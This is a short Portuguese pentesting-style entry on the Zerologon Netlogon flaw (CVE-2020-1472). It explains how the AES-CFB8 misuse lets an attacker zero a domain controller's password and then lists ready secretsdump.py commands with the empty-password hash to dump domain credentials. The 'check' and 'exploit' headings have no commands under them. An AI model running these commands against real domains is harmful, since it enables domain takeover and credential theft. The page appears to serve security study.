
[CVE-2020-1472] Chamada de Protocolo Remoto Netlogon (MS-NRPC) Escalação de Privilégios (Zerologon)
[CVE-2020-1472] Escalação de Privilégio na Chamada de Protocolo Remoto Netlogon (MS-NRPC) (Zerologon)
O ataque descrito aqui aproveita falhas em um protocolo de autenticação criptográfica (uso inseguro de AES-CFB8) que comprova a autenticidade e a identidade de um computador associado ao domínio perante o Domain Controller (DC). Devido ao uso incorreto de um modo de operação AES, é possível falsificar a identidade de qualquer conta de computador (incluindo a do próprio DC) e definir uma senha vazia (simplesmente enviando uma série de mensagens Netlogon nas quais vários campos são preenchidos com zeros) para essa conta no domínio. Isso pode então ser usado para obter credenciais de administrador do domínio e, em seguida, restaurar a senha original do DC.
Para verificar o CVE-2020-1472
Para explorar o CVE-2020-1472
Em seguida, execute um dos seguintes comandos
Exemplo de formato 1: python secretsdump.py domain/example-dc$@fqdn-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc
Exemplo de formato 2: python secretsdump.py domain/example-dc$@ip-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc

A postagem original do blog está disponível aqui
O repositório original que inclui o script de teste em Python está disponível aqui
O repositório original que inclui o script de exploit em Python está disponível aqui